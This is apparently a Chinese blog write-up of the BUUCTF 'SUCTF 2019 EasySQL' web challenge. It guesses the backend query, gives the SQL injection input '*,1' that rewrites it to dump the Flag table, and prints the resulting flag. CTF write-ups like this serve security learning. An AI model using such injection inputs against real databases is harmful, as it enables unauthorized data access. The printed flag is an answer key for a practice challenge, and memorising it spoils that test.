视频分享地址: https://spa|
收藏闪存小组博问

明月照江江

园龄:7年4个月粉丝:34关注:0

📂CTF
🔖CTF
2022-12-07 20:45阅读: 76评论: 0推荐: 0

[BUUCTF][Web][SUCTF 2019]EasySQL 1

这一题有点蛋疼,比较难顶
看了别人的write up 也很难get到解题思路,感觉必须要拿到源码进行审计才能解
大佬们猜后端是这么写的
select $_POST['query'] || flag from Flag;

这里使用来拼接字段名称

那么输入*,1, 用1 || flag得到1,这样拼接出来sql是:
select *,1 from Flag;

得到flag

Array ( [0] => flag{26d6bc25-ce81-4a4c-b24b-8ba243efad8e} [1] => 1 )

本文作者:明月照江江

本文链接:https://www.cnblogs.com/gradyblog/p/16964501.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   明月照江江  阅读(76)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
SQL AI 助手
评论
收藏
关注
推荐
深色
回顶
收起